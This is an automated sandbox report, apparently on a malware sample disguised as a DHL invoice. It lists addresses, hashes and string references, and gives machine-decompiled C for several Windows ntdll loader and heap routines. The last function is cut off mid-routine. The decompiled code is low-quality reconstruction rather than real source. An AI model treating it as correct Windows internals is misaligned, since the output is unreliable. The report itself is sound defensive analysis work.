0x1d84f0e3
0x1d84f0e6
0x1d84f0f4
0x1d84f0f9
0x1d84f0fb
0x1d84f3d2
0x1d84f3d2
0x1d84f3d5
0x1d84f3d5
0x1d84f3d8
0x1d84f3df
0x1d84f3e4
0x00000000
0x1d84f3e4
0x1d84f104
0x1d84f106
0x1d84f10b
0x1d84f111
0x1d84f114
0x1d84f117
0x1d84f119
0x1d84f11c
0x1d84f11e
0x1d84f11e
0x1d84f12e
0x1d84f134
0x1d84f137
0x1d84f13b
0x1d84f13b
0x1d84f13c
0x1d84f13f
0x1d84f142
0x1d84f144
0x1d84f350
0x1d84f350
0x1d84f356
0x1d84f359
0x1d84f378
0x1d84f37d
0x1d84f35b
0x1d84f370
0x1d84f375
0x1d84f383
0x1d84f38e
0x00000000
0x1d84f14a
0x1d84f14a
0x1d84f14d
0x00000000
0x00000000
0x1d84f153
0x1d84f156
0x1d84f15e
0x1d84f163
0x1d84f16a
0x1d84f16a
0x1d84f170
0x1d84f170
0x1d84f177
0x1d84f186
0x1d84f188
0x1d84f18b
0x1d84f18f
0x1d84f194
0x1d84f196
0x00000000
0x1d84f19c
0x1d84f19c
0x1d84f19f
0x1d84f1a3
0x1d84f1ac
0x1d84f1ac
0x1d84f1ac
0x1d84f1ae
0x1d84f1b0
0x1d84f1b3
0x1d84f1b6
0x1d84f1bb
0x1d84f1c5
0x1d84f1c8
0x1d84f1ca
0x1d84f1cb
0x1d84f1cf
0x1d84f1cf
0x1d84f1c8
0x1d84f1d4
0x1d84f1d8
0x1d84f208
0x1d84f20b
0x1d84f20e
0x1d84f1da
0x1d84f1dc
0x1d84f1e1
0x1d84f1e6
0x1d84f1ed
0x1d84f1ff
0x1d84f1ef
0x1d84f1f0
0x1d84f1f5
0x1d84f1f8
0x1d84f1fb
0x1d84f1fb
0x1d84f202
0x1d84f202
0x1d84f202
0x1d84f211
0x1d84f214
0x1d84f218
0x1d84f21b
0x1d84f227
0x1d84f22d
0x1d84f22d
0x1d84f22d
0x1d84f22f
0x1d84f236
0x1d84f238
0x1d84f23c
0x1d84f23c
0x1d84f244
0x1d84f24a
0x1d84f250
0x1d84f2be
0x1d84f2c1
0x1d84f2c4
0x1d84f2c9
0x00000000
0x00000000
0x1d84f2cf
0x1d84f2d2
0x1d84f2d5
0x00000000
0x00000000
0x1d84f2db
0x1d84f2e2
0x00000000
0x00000000
0x1d84f2ec
0x1d84f2f3
0x00000000
0x00000000
0x1d84f2f9
0x1d84f2ff
0x1d84f302
0x1d84f321
0x1d84f326
0x1d84f304
0x1d84f319
0x1d84f31e
0x1d84f337
0x1d84f338
0x1d84f343
0x00000000
0x1d84f252
0x1d84f252
0x1d84f255
0x1d84f274
0x1d84f279
0x1d84f257
0x1d84f26c
0x1d84f271
0x1d84f27f
0x1d84f28d
0x1d84f295
0x1d84f295
0x1d84f29b
0x1d84f29f
0x1d84f2a5
0x1d84f2ac
0x1d84f2b2
0x1d84f2b3
0x1d84f2b3
0x00000000
0x1d84f29f
0x1d84f250
0x1d84f196
0x1d84f0c9
0x1d84f0ce
0x1d84f0d6
0x1d84f0dc
0x1d84f3e7
0x1d84f3ea
0x1d84f3f6
0x1d84f3f6

APIs

RtlDebugPrintTimes.NTDLL ref: 1D84F0D6

Strings

Just allocated block at %p for %Ix bytes, xrefs: 1D84F288
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1D84F33E
HEAP[%wZ]: , xrefs: 1D84F267, 1D84F314, 1D84F36B
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1D84F389
HEAP: , xrefs: 1D84F274, 1D84F321, 1D84F378
RtlAllocateHeap, xrefs: 1D84F0ED

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 2badf3bc5f4af3b6334ec88a22fbc488bad0b530cb7a125661138e5975167993
Instruction ID: 838fc9a50ed206e3a78a43e1708ca62ad08aef6f883a1752a05e1210d2a9348e
Opcode Fuzzy Hash: 2badf3bc5f4af3b6334ec88a22fbc488bad0b530cb7a125661138e5975167993
Instruction Fuzzy Hash: 2E911536904689DFCB06CFA8D898BADBBF2FF49720F25C05DE4459B261C735A940CB12

Uniqueness

Uniqueness Score: -1.00%

Function 1D79640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1D79640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x1d89b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E1D796C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x1d8937c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E1D79BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E1D7E4B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E1D81E692();
					_t85 =  *0x1d8937c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E1D7BE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E1D796B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E1D7CE7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x1d8937c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E1D81E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x1d8937c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x1d895d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E1D7D7DF6( *((intOrPtr*)(_t108 + 0xc)));
					E1D7BD3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E1D796868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x1d8937c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x1d899208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x1d895b24; // 0x17e2d00
					asm("ror esi, cl");
					 *0x1d8991e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E1D796565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E1D7B3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x1d796415
0x1d796422
0x1d79642e
0x1d79642f
0x1d796434
0x1d79643a
0x1d79643b
0x1d796440
0x1d796446
0x1d79644e
0x1d796458
0x1d796460
0x1d796465
0x1d79646c
0x1d7f9770
0x1d7f9776
0x1d7f9779
0x1d7f97b3
0x1d7f97b3
0x1d7f97dd
0x1d7f97dd
0x1d7f97e3
0x1d7f97e3
0x1d796542
0x1d796542
0x1d79654a
0x1d7f982b
0x1d7f982b
0x1d796557
0x1d796558
0x1d796559
0x1d796564
0x1d796564
0x1d7f977b
0x1d7f977c
0x1d7f9781
0x1d7f9783
0x1d7f9788
0x1d7f97a0
0x1d7f97a0
0x1d7f97a5
0x1d7f97aa
0x1d7f97b0
0x00000000
0x1d7f97b0
0x1d79647e
0x1d79648b
0x1d796498
0x1d79649e
0x1d7f97ed
0x1d7f97ed
0x1d7964a4
0x1d7964a6
0x1d7f97f7
0x1d7f97fc
0x1d7f97fe
0x1d7f97ce
0x1d7f97d3
0x1d7f97d8
0x1d7f97d8
0x1d7f97db
0x00000000
0x1d7964ac
0x1d7964b0
0x1d7964be
0x1d7964c3
0x1d7964cc
0x1d7964d1
0x1d7964d8
0x1d7f9802
0x1d7f9808
0x1d7f980b
0x00000000
0x00000000
0x1d7f978f
0x1d7f9790
0x1d7f9795
0x1d7f9796
0x1d7f979b
0x00000000
0x1d7f979b
0x1d7964de
0x1d7964eb
0x1d7964f1
0x1d7964f9
0x1d796507
0x1d796510
0x1d79651c
0x1d796526
0x1d79652c
0x1d79653c
0x1d7f981d
0x1d7f981d
0x1d79653c
0x00000000
0x1d796526

APIs

RtlDebugPrintTimes.NTDLL ref: 1D79651C

Part of subcall function 1D796565: RtlDebugPrintTimes.NTDLL ref: 1D796614
Part of subcall function 1D796565: RtlDebugPrintTimes.NTDLL ref: 1D79665F

Strings

apphelp.dll, xrefs: 1D796446
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D7F977C
Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D7F9790
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D7F97B9
LdrpInitShimEngine, xrefs: 1D7F9783, 1D7F9796, 1D7F97BF
minkernel\ntdll\ldrinit.c, xrefs: 1D7F97A0, 1D7F97C9

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 267571daa9985d34b2ee3a31c655dcee470565f317dffd5b77cf53af0289817b
Instruction ID: a390db81f4854451b82ca2a7e31d2d173b28b77617acfa53e527217b30deb5c2
Opcode Fuzzy Hash: 267571daa9985d34b2ee3a31c655dcee470565f317dffd5b77cf53af0289817b
Instruction Fuzzy Hash: 17519D716083409FD229CF24DC95BAF77E8BF84674F41491AF6959B2A1DB30E904CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 1D81FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E1D81FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E1D81F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x1d8937c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E1D81E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x1d8937c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x1d89391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x1d8991e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E1D7D6010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x1d8991e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

0x1d81fa10
0x1d81fa12
0x1d81fa18
0x1d81fa1d
0x1d81fa2b
0x1d81fa30
0x1d81fa35
0x1d81fa3a
0x1d81fa3c
0x1d81fa40
0x1d81fa42
0x1d81fa42
0x1d81fa47
0x1d81fa50
0x1d81fa51
0x1d81fa54
0x1d81fa6d
0x1d81fa72
0x1d81fa77
0x1d81fa7c
0x1d81fa7e
0x1d81fa7e
0x1d81fa81
0x1d81fa99
0x00000000
0x1d81fa83
0x1d81fa8a
0x1d81fa8d
0x1d81fa9b
0x1d81fa9b
0x00000000
0x1d81fa95
0x1d81fa95
0x1d81fa9d
0x1d81fa9d
0x1d81faa2
0x1d81fb01
0x1d81fb01
0x1d81fb06
0x1d81fb0a
0x1d81fb0c
0x1d81fb0c
0x1d81fb15
0x1d81fb1d
0x1d81fb1d
0x00000000
0x1d81faa8
0x1d81faae
0x1d81fab4
0x1d81faba
0x1d81fabd
0x1d81fac4
0x1d81fac7
0x1d81facf
0x1d81fad4
0x1d81fae5
0x1d81fae8
0x1d81fad6
0x1d81fad6
0x1d81fadd
0x1d81fadd
0x1d81faf3
0x1d81fafb
0x1d81faff
0x1d81fb21
0x1d81fb25
0x00000000
0x00000000
0x00000000
0x1d81faff
0x1d81faa2
0x1d81fa8d

APIs

RtlDebugPrintTimes.NTDLL ref: 1D81FAF3
RtlDebugPrintTimes.NTDLL ref: 1D81FB15

Strings

Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1D81FA58
Unknown, xrefs: 1D81FA42, 1D81FA54
minkernel\ntdll\ldrdload.c, xrefs: 1D81FA68
LdrpRedirectDelayloadFailure, xrefs: 1D81FA5E
$, xrefs: 1D81FABD

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 30bb7b827436cb8a72a354dbba1d0b0415be10a34fe7c7ee49a891561ca7403e
Instruction ID: dcc56293e6a3674093ef2f56303293066a8c2adc937974c68c79e4c69d2bd7bb
Opcode Fuzzy Hash: 30bb7b827436cb8a72a354dbba1d0b0415be10a34fe7c7ee49a891561ca7403e
Instruction Fuzzy Hash: F8416EB7A00219AFCB05CF98C880AEEBBB5FF98354F114129F944AB351D7359909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D7A9046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1D7A9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x1d87be98);
				E1D7F7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E1D7E8F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E1D7B9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x1d8965e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E1D7BA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E1D7C5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E1D7C04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x1d8965e0; // 0x75f8a680
							 *0x1d8991e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x1d8965e8; // 0x776c7740
									if(_t148 != 0) {
										 *0x1d8991e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E1D7BDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E1D7B3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E1D7B9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E1D80247B();
									goto L26;
								} else {
									_t152 = E1D7BA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E1D7C04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x1d7a9046
0x1d7a9046
0x1d7a904b
0x1d7a9050
0x1d7a9055
0x1d7a905b
0x1d7a905d
0x1d7a9066
0x1d7a906f
0x1d7a9078
0x1d7a9080
0x1d7a9088
0x1d7a908f
0x1d7a9095
0x1d7a90a9
0x1d7a90b1
0x1d7a90be
0x1d7a90c6
0x1d7a90cf
0x1d7a90e2
0x1d7a90f7
0x1d7a90fb
0x1d7a9118
0x00000000
0x1d7a9123
0x1d7a913b
0x1d7a913f
0x00000000
0x00000000
0x1d7a9147
0x1d80231f
0x1d80231f
0x00000000
0x1d80231f
0x1d7a9154
0x1d802330
0x1d802336
0x1d802336
0x1d7a915a
0x1d7a915a
0x1d7a915a
0x1d7a9161
0x1d7a9167
0x1d7a916b
0x1d7a9172
0x1d7a9182
0x1d7a918e
0x1d7a9199
0x1d7a91ba
0x1d7a91be
0x00000000
0x1d7a91e0
0x1d802358
0x1d802360
0x1d802368
0x1d80236a
0x1d802372
0x00000000
0x1d802378
0x1d802378
0x1d802381
0x1d802458
0x1d802458
0x1d80245b
0x1d802463
0x1d802468
0x1d80246e
0x1d80246e
0x1d8024a7
0x00000000
0x1d8024a7
0x1d80238f
0x1d802396
0x1d80239c
0x1d80239f
0x1d80239f
0x1d8023bb
0x1d8023c8
0x1d8023ca
0x1d8023d2
0x1d80244c
0x1d80244c
0x1d802453
0x00000000
0x1d8023d4
0x1d8023e7
0x1d8023e9
0x1d8023f1
0x00000000
0x00000000
0x1d8023f9
0x1d802402
0x1d802408
0x1d80240c
0x1d802413
0x1d802423
0x1d80243f
0x00000000
0x00000000
0x1d802441
0x1d802446
0x1d802446
0x00000000
0x1d802446
0x1d8023fb
0x00000000
0x1d8023fb
0x1d8023d2
0x00000000
0x1d802372
0x1d7a91be
0x1d7a9118
0x1d7a90fd
0x1d7a9102
0x1d7a910e

APIs

RtlDebugPrintTimes.NTDLL ref: 1D802360

Strings

@wlw, xrefs: 1D80245B
@, xrefs: 1D7A9095
$, xrefs: 1D7A90B1

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@$@wlw
API String ID: 3446177414-3581332286
Opcode ID: 0d37665a21a752d1b1ba2c5e99cae6ad45aecd743359685740847f30d9cc7d7b
Instruction ID: e3616aaf8d8f43ab554b78de78e96f147ac074c90b709bfc9c52bebb43cd953d
Opcode Fuzzy Hash: 0d37665a21a752d1b1ba2c5e99cae6ad45aecd743359685740847f30d9cc7d7b
Instruction Fuzzy Hash: 9F815F76D002699BDB25CF54CC85BEEB7B8AF48750F0141DAEA09B7250E7705E84CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D84F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1D84F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x1d87d2f8);
				E1D7F7BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E1D797662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E1D84FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E1D7AFED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E1D850835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E1D79753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d8947d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E1D7B3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
